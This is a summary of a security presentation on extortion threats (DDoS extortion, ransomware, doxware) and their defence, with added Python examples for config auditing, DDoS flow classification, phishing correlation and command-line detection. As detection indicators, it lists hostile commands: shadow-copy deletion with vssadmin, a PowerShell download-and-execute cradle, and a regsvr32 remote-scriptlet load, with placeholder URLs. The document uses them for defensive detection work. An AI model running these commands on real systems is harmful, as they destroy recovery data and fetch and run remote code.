This document summarizes a presentation on e-extortion trends and defense. It discusses the evolution of extortion from early distributed denial of service attacks and ransomware to more sophisticated techniques that combine encryption, data exfiltration, and extortion demands. The presentation outlines strategies for defending against these threats, including backups, system hardening, endpoint security solutions, threat intelligence sharing, and following financial trails.
2. Cisco Confidential 2
Whoami
• Incident Response Analyst for Cisco Security Advisory Services. Working with customers performing strategic, proactive, and reactive response to information security issues
• 3 years – Insider threat analyst, then Intrusion Forensics and Hunt Team manager at JPMorgan Chase
• 13 years law enforcement performing digital forensics and computer crime investigations
Cats Catch Some Mice Again
• Early 2016 Interpol coordinated arrests of Armada Collective members in Australia, and DD4BC members in Bosnia and Herzegovina
Ransom Hits Home
• Publicly accessible NoSQL, Elasticsearch, Hadoop, Redis being deleted with ransom note left.
• Completely unable to be recovered, EVEN IF YOU PAY
The Gift That Keeps Giving
• In January, Cisco Talos researchers found new variants of Locky also deliver the Kovter click fraud Trojan
• http://blog.talosintel.com/2017/01/locky-struggles.html
E-Extortion Trifecta
• Doxware brings all the extortion tactics into one, and is becoming more mainstream:
• Encryption
• Exfiltration
• Extortion demands
• Public Data Leak
What We Know So Far
• History repeats itself with the cat-and-mouse game, and innovation of the mice
– We have to be ready for the next evolution of threats
• Getting to know your enemy can keep you from paying out to imposters
– We need to gain intelligence about our threats
• Even if you pay your enemy, what keeps them from coming back again and again wanting more handouts?
– Let’s be prepared to defend ourselves and maintain business continuity plans
Ransom?
• “Without a hostage, there is no ransom. That’s what a ransom is.”
- The rules according to Walter Sobchak
Backups – Offline if Possible
• CryptoFortress – encrypting unmapped shares
• SamSam – criminal group obtaining foothold through LFI, conducting surveillance, then encrypting everything including backup servers
System Hardening
• Over 90% of PowerShell scripts analyzed by Symantec were malicious in 2016. If endpoints don’t need PS, remove it
• If you can’t remove PS, disable ISE and REPL ability
• Application whitelisting
• Change default network options for NoSQL
• bind 127.0.0.1 instead of 0.0.0.0
• Change default ports to custom config to stifle script kiddies
• https://www.elastic.co/blog/protecting-against-attacks-that-hold-your-data-for-ransom
• Restrict IP ranges that can access your NoSQL Instance
• Implement security group for cloud instances
• http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html
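An added example (not from the presentation) that turns the "bind 127.0.0.1 instead of 0.0.0.0" advice into a check: a small Python audit that reads the text of a redis.conf, mongod.conf or elasticsearch.yml and flags a bind setting that exposes the datastore on every interface, the exposure behind the ransom deletions described above. The directive names (redis.conf bind, MongoDB bindIp / bindIpAll, Elasticsearch network.host) are the real ones; the sample config texts and the function names are constructed for this example.

```python
"""Audit datastore configs for listeners bound to all interfaces (added example)."""
import re
from typing import Dict, List

# Bind values that put the listener on every interface.
WILDCARD_BINDS = {"0.0.0.0", "::", "*", "_global_", "bindIpAll"}

# Bind directive per product in its native config format:
# redis.conf "bind ...", mongod.conf YAML "bindIp: ...", elasticsearch.yml "network.host: ...".
BIND_DIRECTIVES = {
    "redis": re.compile(r"^\s*bind\s+(.+?)\s*$", re.I),
    "mongodb": re.compile(r"^\s*bindIp\s*:\s*(.+?)\s*$"),
    "elasticsearch": re.compile(r"^\s*network\.host\s*:\s*(.+?)\s*$"),
}
# MongoDB's "bindIpAll: true" overrides bindIp and also exposes every interface.
MONGO_BIND_ALL = re.compile(r"^\s*bindIpAll\s*:\s*true\b")


def _split_values(raw: str) -> List[str]:
    """Accept 'a b', 'a,b', '[a, b]' and quoted forms."""
    raw = raw.strip().strip("[]")
    return [v.strip().strip("\"'") for v in re.split(r"[,\s]+", raw) if v.strip()]


def audit_bind_config(product: str, text: str) -> Dict[str, object]:
    """Report whether a config text binds the datastore to all interfaces."""
    pattern = BIND_DIRECTIVES[product]
    bound: List[str] = []
    for line in text.splitlines():
        code = line.split("#", 1)[0]  # ignore trailing comments
        match = pattern.match(code)
        if match:
            bound.extend(_split_values(match.group(1)))
        if product == "mongodb" and MONGO_BIND_ALL.match(code):
            bound.append("bindIpAll")
    exposed = any(v in WILDCARD_BINDS for v in bound)
    if not bound:
        status = "unset: verify the product default for your version"
    elif exposed:
        status = "exposed on all interfaces; bind to 127.0.0.1 or an internal address"
    else:
        status = "restricted"
    return {"product": product, "bound_to": bound, "exposed": exposed, "status": status}


# Constructed sample configs: the weak setting beside the corrected one for each product.
SAMPLES = {
    "redis-weak": ("redis", "bind 0.0.0.0\nport 6379\n"),
    "redis-fixed": ("redis", "# local clients only\nbind 127.0.0.1\nport 6379\n"),
    "mongo-weak": ("mongodb", "net:\n  port: 27017\n  bindIp: 0.0.0.0\n"),
    "mongo-fixed": ("mongodb", "net:\n  port: 27017\n  bindIp: 127.0.0.1\n"),
    "es-weak": ("elasticsearch", "cluster.name: demo\nnetwork.host: 0.0.0.0\nhttp.port: 9200\n"),
    "es-fixed": ("elasticsearch", "cluster.name: demo\nnetwork.host: 127.0.0.1\nhttp.port: 9200\n"),
}


def audit_all(samples=SAMPLES) -> Dict[str, bool]:
    """Sample name -> exposed flag, for every sample config."""
    return {name: audit_bind_config(product, text)["exposed"]
            for name, (product, text) in samples.items()}


if __name__ == "__main__":
    for name, (product, text) in SAMPLES.items():
        print(f"{name:12s} {audit_bind_config(product, text)['status']}")
```

A loopback bind is the first step only; the slide's other items (custom ports, restricted source IP ranges, cloud security groups) still apply, since an internal address reachable from the whole LAN is still reachable by anything that lands on the LAN.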
Endpoint Solutions
• Able to review for heuristic patterns of binaries being called, and review command line parameters such as:
• "Vssadmin.exe delete shadows /all /quiet del /f /q %0"
• "rundll32.exe C:\Users\$username\AppData\Local\Temp"
• "rundll32.exe javascript:"mshtml,RunHTMLApplication<script execution stuff>.RegRead("HKCU\<specific registry path>")"" will interpret in the command line as "rundll.exe mshtml.dll, $hexadecimal for entry point in memory"
• "regsvr32.exe /s /u /i:<URL> scrobj.dll", where <URL> is anything matching ^((http[s]?|ftp):\/)?\/?([^:\/\s]+)((\/\w+)*\/)([\w\-\.]+[^#?\s]+)(.*)?(#[\w\-]+)?$
• "Powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('<URL>')"", with the same URL pattern
• "Maliciousbinary.exe %windir%\system32\..\..\%smstc.exe"
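An added example, not the presentation's code: a Python pass over constructed process-creation log lines that turns the command-line indicators above into named detection rules, so the patterns can be tested against an endpoint telemetry export before being loaded into a production rule set. The log format (pid|parent image|command line), the rule names and all sample entries are assumptions for this example; example.invalid is a reserved test domain.

```python
"""Heuristic review of process command lines for ransomware-style tradecraft (added example)."""
import re
from typing import List, Tuple

# (rule name, pattern). Case-insensitive; backslashes are literal path separators.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("rundll32_javascript",
     re.compile(r"\brundll32(\.exe)?\s+javascript:", re.I)),
    ("rundll32_from_user_temp",
     re.compile(r"\brundll32(\.exe)?\s+.*\\AppData\\Local\\Temp\\", re.I)),
    ("regsvr32_remote_scriptlet",
     re.compile(r"\bregsvr32(\.exe)?\b.*\s/i:\S*(https?|ftp):.*\bscrobj\.dll\b", re.I)),
    ("powershell_download_cradle",
     re.compile(r"\bpowershell(\.exe)?\b.*\biex\b.*DownloadString", re.I)),
    ("path_traversal_in_image",
     re.compile(r"%windir%\\system32\\(\.\.\\)+", re.I)),
]


def classify_command_line(cmd: str) -> List[str]:
    """Names of every rule the command line triggers (empty list if nothing fires)."""
    return [name for name, pattern in RULES if pattern.search(cmd)]


def scan_process_log(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Each line is 'pid|parent_image|command_line' (a constructed format)."""
    hits = []
    for line in lines:
        pid, parent, cmd = line.split("|", 2)
        matched = classify_command_line(cmd)
        if matched:
            hits.append((pid, parent, matched))
    return hits


# Constructed sample telemetry: one benign entry and one entry per indicator.
SAMPLE_LOG = [
    "1001|explorer.exe|C:\\Windows\\System32\\notepad.exe C:\\Users\\alice\\notes.txt",
    "1002|cmd.exe|vssadmin.exe Delete Shadows /All /Quiet",
    "1003|winword.exe|powershell -nop -c \"iex(New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/a')\"",
    "1004|explorer.exe|rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\upd.dll,Start",
    "1005|svchost.exe|regsvr32.exe /s /u /i:http://example.invalid/x.sct scrobj.dll",
    "1006|cmd.exe|rundll32.exe javascript:\"mshtml,RunHTMLApplication \";alert(1)",
    "1007|cmd.exe|%windir%\\system32\\..\\..\\Temp\\unknown.exe",
]

if __name__ == "__main__":
    for pid, parent, rules in scan_process_log(SAMPLE_LOG):
        print(pid, parent, ", ".join(rules))
```

The parent image is carried through because it is the cheapest context for triage: a download cradle spawned by an Office process is a different conversation from one spawned by an administrator's console session.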
One DDoS Does Not Fit All
• Volume Based Attacks – goal is to overload bandwidth – UDP flood, ICMP floods (bits per second)
• Protocol Attacks – goal is to overload router, firewall, and GLB – fragmented packets, Smurf Attack (spoof victim IP for requests reflected at victim) (packets per second)
• Application Attacks – goal is to overload the resources of the web server – flood of GET or POST requests – Slowloris – creating connections with only partial requests to leave connection open (requests per second)
Mirai
• Internet of Terribly Secured Things opened the door to the most geographically dispersed botnets for DDoS
• Mirai takes over device and shuts off Telnet, SSH, and HTTP ports so remote access isn’t possible for remediation
• Baby Monitors and CCTV cameras responsible for high profile attacks
• Using dictionary of ~60 weak passwords (less than the Morris
DDoS Game Plan
• Be able to detect DDoS before network is inaccessible, or systems are crashing, using NetFlow, system resource, and Firewall traffic monitoring dashboards
• Have a plan for blocking, dropping, scrubbing, rate limiting traffic using local appliances or a vendor relationship
• Do not rely solely on an agreement with ISP as your plan for DDoS mitigation
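An added example (not from the presentation) tying the "One DDoS Does Not Fit All" categories to the game plan of detecting from NetFlow before links saturate: the block aggregates simplified flow records per destination over a time window, derives the three rates the slide names (bits per second, packets per second, requests per second), and reports which category each destination has crossed. The record layout, the destinations, the per-second thresholds and the sample flows are all constructed for this example; the thresholds in particular stand in for whatever baseline your own NetFlow history supports.

```python
"""Classify DDoS activity from aggregated flow records (added example)."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Flow:
    """Simplified NetFlow-style record; field set is constructed, not a real export format."""
    dst: str
    proto: str               # "udp", "icmp", "tcp"
    packets: int
    byte_count: int
    fragmented: bool = False
    http_requests: int = 0   # application-layer requests observed in this flow


# Per-second thresholds: assumed demo values, to be replaced by measured baselines.
THRESHOLDS = {"bps": 1_000_000_000, "pps": 500_000, "rps": 5_000}


def summarize(flows: List[Flow], window_seconds: int) -> Dict[str, Dict[str, float]]:
    """Per destination: bits/s, packets/s, requests/s and share of fragmented packets."""
    agg = defaultdict(lambda: {"bits": 0, "packets": 0, "requests": 0, "fragmented": 0})
    for f in flows:
        a = agg[f.dst]
        a["bits"] += f.byte_count * 8
        a["packets"] += f.packets
        a["requests"] += f.http_requests
        if f.fragmented:
            a["fragmented"] += f.packets
    return {
        dst: {
            "bps": a["bits"] / window_seconds,
            "pps": a["packets"] / window_seconds,
            "rps": a["requests"] / window_seconds,
            "fragment_ratio": a["fragmented"] / a["packets"] if a["packets"] else 0.0,
        }
        for dst, a in agg.items()
    }


def classify(stats: Dict[str, float]) -> List[str]:
    """Map the slide's three categories onto the rates; every category that fires is returned."""
    kinds = []
    if stats["bps"] >= THRESHOLDS["bps"]:
        kinds.append("volume (bps)")
    # Protocol attacks: raw packet rate, or a mostly-fragmented stream at a tenth of that rate.
    if stats["pps"] >= THRESHOLDS["pps"] or (
        stats["fragment_ratio"] >= 0.5 and stats["pps"] >= THRESHOLDS["pps"] // 10
    ):
        kinds.append("protocol (pps)")
    if stats["rps"] >= THRESHOLDS["rps"]:
        kinds.append("application (rps)")
    return kinds


def detect(flows: List[Flow], window_seconds: int) -> Dict[str, List[str]]:
    """Destinations that crossed at least one threshold, with the category names."""
    report = {}
    for dst, stats in summarize(flows, window_seconds).items():
        kinds = classify(stats)
        if kinds:
            report[dst] = kinds
    return report


WINDOW_SECONDS = 10
# Constructed sample window: three attack shapes and one ordinary web server.
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "udp", packets=2_000_000, byte_count=3_000_000_000),          # ~2.4 Gbit/s UDP flood
    Flow("10.0.0.6", "udp", packets=1_000_000, byte_count=60_000_000, fragmented=True),  # fragment stream
    Flow("10.0.0.7", "tcp", packets=200_000, byte_count=20_000_000, http_requests=100_000),  # GET flood
    Flow("10.0.0.8", "tcp", packets=5_000, byte_count=4_000_000, http_requests=400),  # normal traffic
]

if __name__ == "__main__":
    for dst, kinds in detect(SAMPLE_FLOWS, WINDOW_SECONDS).items():
        print(dst, kinds)
```

Slowloris-style connection exhaustion does not show up in any of these three rates, which is why the slide pairs NetFlow with system-resource dashboards: a web server with a full connection table and near-idle bandwidth is the signature to watch for there.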
Extortion threats and vulnerabilities were easier to gauge prior to the beginnings of e-extortion.
Mafia-style extortion had some drawbacks, mainly due to easier attrition, and law enforcement action.
Through the entire life of extortion, the cat and mouse evolution stays the same though
As with all things, everything old is new again.
This threat resurfaced in 2013 without much change in the wording, but was at least leveraging new technology and asking for bitcoin payment with a link to a BTC address.
History repeats itself in 2015 when the real Armada Collective caused harm to many email providers and financial institutions. The warning by DHS shows that there was a small DDoS attack, a show of power, followed by an email demand for payment.
Lizard Squad received much media attention for its DDoS attacks on gaming networks despite giving warning of the attacks ahead of time on Twitter.
They also chose to stop their Christmas 2014 DDoS of the Xbox network after Kim Dotcom agreed to pay them in Megaupload vouchers so he could play Destiny.
After Armada Collective was arrested, this group sent phish emails to companies and cashed in without ever launching an attack. The MO of email before DDoS didn’t match what the real Armada Collective did, and it didn’t take a costly Threat Intel feed to Google the DHS alert and learn that the real group operated differently.
All it takes is an email address to collect money if you can capitalize on a famous name. In 2015 multiple companies paid up to phishing emails after seeing what the mighty Sony and Microsoft networks couldn’t stop from Lizard Squad.
We are now seeing the combination of ransomware with other types of malware to keep attacks active after the payment of ransom.
With high profile ransoms for breached data by certain actors, and the profitability of ransomware, why have these forces not combined: ransomware with information stealing malware, to exfiltrate encrypted files, and then sell the data online if the ransom is not paid, or even if it is?
Ranscam differs from other ransomware families like Locky, Cryptolocker, Cerber, etc., because even if you pay, they do not release your files.
Definitely good to know if you will be paying for nothing. Will be interesting to see how this changes the underground economy of ransomware.
Newer variant is Linux Killdisk. Demanding $250k
Victor Gevers (security researcher) started noting MongoDB instances being deleted on Dec 26, 2016. Expanded to others.
Scriptable Actions, no recovery possible
Sigaint email addresses are in multiple campaigns
Even after files released on Locky payment, infection can remain
Combining Pony credential stealing with ransomware. Becoming more prevalent since Oct 2016, reported on by https://www.scmagazine.com/researchers-spot-ransomware-with-abilities-to-leak-data-for-non-compliance/article/567622/
Big Lebowski. Found Bunny Lebowski went home, and the Germans kept trying to get the ransom money. “WTF,” Walter said. Those are the rules. Is he the only one who cares about the rules?
If we can keep ransomware from having any effect, then there is no ransom at all. Next slides discuss how.
Offline backups need to be emphasized with new ransomware variant CryptoFortress discovered in March 2016 seeking SMB paths not even mapped.
Samas targeting backup servers.
Have you tried to recover from those backups and seen if your process and backup style/age is conducive to it?
Changes to PSEXEC key, terminal server key, PuTTY key
Disable ports and services not needed
Eliminate powershell if not needed
Disable REPL or ISE if powershell needed
Use VPC security groups
https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/
Visibility to new MD5 on system, new services, scheduled jobs, registry key changes
Putty, terminal services, psexec keys etc
Application Whitelisting – alternatively limit executables to run only from certain paths
Disable unneeded ports and services (HTTP etc)
Defined roles on network shares with least privilege for user access
Privileged Account Management
If machines/shares are affected, is there a plan for continuity, to segment that machine, and route traffic around, or go to paper?
Game plan for detecting DDoS before there are saturated links, or system resource issues. Types of DDoS, discuss early detection from Lancope, or other systems, having a plan for blocking, dropping, monitoring, scrubbing.
In-network Appliances can mitigate application layer attacks – geo-blocking (50% of DDoS originating IP space in China), rate limiting, signatures of packets
Partnership with Radware, Arbor, Cloudflare. Don’t rely on ISP as the only play in your playbook
Lizard Squad also innovated with DDoS as a Service where anyone with a bitcoin or two could lease their power to shut down any site they wanted.
Recent Arrests of 3 in Israel who had profited $600,000 renting out DDoS infrastructure.
To not be one of the statistics in the $100,000 paid in BTC to Armada Collective Imposters in 2016, or any amount to its peers, all a victim needed to do was look on Twitter or Google. Both perfectly good sources of Intel. A solid list of infosec leaders being followed on Twitter can be a great early warning system
Following the money might not be for everyone, but law enforcement are now able to track Bitcoin transactions all the way to the wallets. These types of tools are also increasingly being used by financial institutions who need to comply with KYC regulations if they want to take part in any blockchain transactions. It’s how we know that $209 million has been paid out to ransomware in Q1 and Q2 2016.
You can see if others are paying to the wallet from your issue. If not, maybe it is targeted?
Collage of Threat Intel Vendors, discussion of CIM, STIX, TAXII and integration
Visualize Your own logs from Phishing campaigns, bucketing for work groups, M&A activity, projects people are on.
Collecting data on who the recipients of phishing emails are can begin to show you relationships, especially if you use a visualization tool such as i2 Analyst’s Notebook, Splunk, or on the free side, an ELK stack. Are there common recipients between campaigns, does this happen often, are they in the same workgroup, are they working on a deal with the same external customer, could that customer have had a breach causing a leak of emails, or is that customer possibly doing their own recon? It has been known to happen.
A word cloud will be weighted to show the most common terms as larger, and can be valuable for showing any common items that could be used for detection, or just to know trends.
This can be valuable not only for real phishing, but for phishing training to know what your employees are more susceptible to
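An added example (not from the presentation) of the recipient bucketing and term weighting the notes above describe, done in plain Python before any visualization tool is involved: it finds recipients hit by more than one campaign, buckets each campaign's recipients by workgroup, and weights subject-line terms the way a word cloud would. The campaign records, the user directory, the stopword list and the function names are all constructed for this example.

```python
"""Correlate phishing campaign recipients and subject terms (added example)."""
import re
from collections import Counter, defaultdict
from typing import Dict, List

# Constructed sample: three campaigns as they might be logged from a mail gateway.
CAMPAIGNS = [
    {"id": "C1", "subject": "Urgent invoice payment overdue", "recipients": ["alice", "bob", "carol"]},
    {"id": "C2", "subject": "Invoice attached please review", "recipients": ["bob", "dave"]},
    {"id": "C3", "subject": "Password reset required urgent", "recipients": ["alice", "bob", "erin"]},
]
# Constructed directory lookup: user -> workgroup (in practice, an HR or AD export).
DIRECTORY = {"alice": "finance", "bob": "finance", "carol": "legal",
             "dave": "m_and_a", "erin": "engineering"}
STOPWORDS = {"please", "the", "a", "to", "is", "of", "and"}


def recipient_campaigns(campaigns: List[dict]) -> Dict[str, List[str]]:
    """Recipient -> list of campaign ids that reached them."""
    seen = defaultdict(list)
    for c in campaigns:
        for r in c["recipients"]:
            seen[r].append(c["id"])
    return dict(seen)


def repeat_targets(campaigns: List[dict], min_campaigns: int = 2) -> Dict[str, List[str]]:
    """Recipients that appear in at least min_campaigns distinct campaigns."""
    return {r: ids for r, ids in recipient_campaigns(campaigns).items()
            if len(ids) >= min_campaigns}


def workgroup_buckets(campaigns: List[dict], directory: Dict[str, str]) -> Dict[str, Counter]:
    """Campaign id -> Counter of recipient workgroups ("unknown" if not in the directory)."""
    return {c["id"]: Counter(directory.get(r, "unknown") for r in c["recipients"])
            for c in campaigns}


def most_targeted_workgroup(campaigns: List[dict], directory: Dict[str, str]) -> str:
    """Workgroup with the most recipient hits summed across all campaigns."""
    total = Counter()
    for bucket in workgroup_buckets(campaigns, directory).values():
        total.update(bucket)
    return total.most_common(1)[0][0]


def subject_term_weights(campaigns: List[dict]) -> Counter:
    """Term -> count across subjects; the weights a word cloud would render by size."""
    words = Counter()
    for c in campaigns:
        for w in re.findall(r"[a-z]+", c["subject"].lower()):
            if w not in STOPWORDS:
                words[w] += 1
    return words


if __name__ == "__main__":
    print("repeat targets:", repeat_targets(CAMPAIGNS))
    print("per-campaign workgroups:", workgroup_buckets(CAMPAIGNS, DIRECTORY))
    print("most targeted workgroup:", most_targeted_workgroup(CAMPAIGNS, DIRECTORY))
    print("subject terms:", subject_term_weights(CAMPAIGNS).most_common(5))
```

The repeat-target list is the one to feed into the questions in the notes (same deal, same external customer, leaked address book?), and the term weights double as candidate detection strings and as a measure of which lures the training program should cover.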